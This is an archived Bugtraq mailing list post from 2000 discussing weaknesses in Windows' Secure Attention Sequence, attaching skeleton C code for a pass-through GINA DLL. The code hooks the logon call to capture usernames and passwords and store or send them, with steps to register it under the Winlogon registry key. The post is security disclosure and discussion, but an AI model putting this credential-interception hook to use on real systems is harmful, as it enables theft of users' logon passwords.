Bugtraq mailing list archives
Re: Windows 2000 Run As... Feature
From: jdglaser () NTOBJECTIVES COM (jdglaser)
Date: Mon, 24 Jan 2000 06:31:31 -0800
That's a good point. I'd like to add that MS Secure Attention Sequence is not exactly so trusted. Nothing prevents another Gina from being put into play, nor prevents process code injection - DLL API hooking. One way to do this can be done by altering the reg key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon to implement a Pass-Through Gina (one which grabs your password and then calls through to the real Gina) While SAS prevents the old-style pop and disappear logon screens, it does nothing to prevent password interception by trojan dll injection. Both of these compromise the trust of the current SAS implemetation. In light of that, I'm not sure another password path matters. Just my thoughts, jdg Attached is an example of GINA pass-through code - pop the below listed code into a dll, write the dll name as the value to the above listed key and SAS now has an untrusted element. int WINAPI WlxLoggedOutSAS (PVOID pWlxContext, DWORD dwSasType, PLUID pAuthenticationId, PSID pLogonSid, PDWORD pdwOptions, PHANDLE phToken, PWLX_MPR_NOTIFY_INFO pMprNotifyInfo, PVOID *pProfile) { //call real gina api iRet = GWlxLoggedOutSAS (pWlxContext, dwSasType, pAuthenticationId, pLogonSid, pdwOptions, phToken, pMprNotifyInfo, pProfile); pMprNotifyInfo->pszUserName, <-Grab this pMprNotifyInfo->pszPassword, <-Grab this <insert whatever> hFile = CreateFile (); <-Store it, send it, mail it WriteFile (); CloseHandle (hFile); return iRet; } -----Original Message----- From: David Terrell [SMTP:dbt () meat net] Sent: Friday, January 21, 2000 3:49 PM To: BUGTRAQ () SECURITYFOCUS COM Subject: Windows 2000 Run As... Feature
this is the first time (I know of) that the system asks for your password through a mechanism other than the trusted path (ctrl-alt-del to login,
Current thread:
- Re: Windows 2000 Run As... Feature, (continued)
- Re: Windows 2000 Run As... Feature Steven Kastl (Jan 23)
- Re: Windows 2000 Run As... Feature Jesper M. Johansson (Jan 24)
- Re: Windows 2000 Run As... Feature David LeBlanc (Jan 25)
- Re: Windows 2000 Run As... Feature Ben Russell (Jan 25)
- Re: Windows 2000 Run As... Feature Steve Wolfe (Jan 26)
- Re: Windows 2000 Run As... Feature Kenn Humborg (Jan 27)
- SAS behavior in Windows NT - RE: Windows 2000 Run As... Feature jdglaser (Jan 26)
- Re: SAS behavior in Windows NT - RE: Windows 2000 Run As... Feature Jesper M. Johansson (Jan 26)
- Re: SAS behavior in Windows NT - RE: Windows 2000 Run As... Feature Peter Berendi (Jan 27)
- Re: Windows 2000 Run As... Feature David LeBlanc (Jan 25)
- Re: SAS behavior in Windows NT - RE: Windows 2000 Run As... Feature David LeBlanc (Jan 26)
- Re: Windows 2000 Run As... Feature Camillo Särs (Jan 24)
- multicasts from hell Tim Yardley (Jan 25)
- Re: Windows 2000 Run As... Feature David LeBlanc (Jan 25)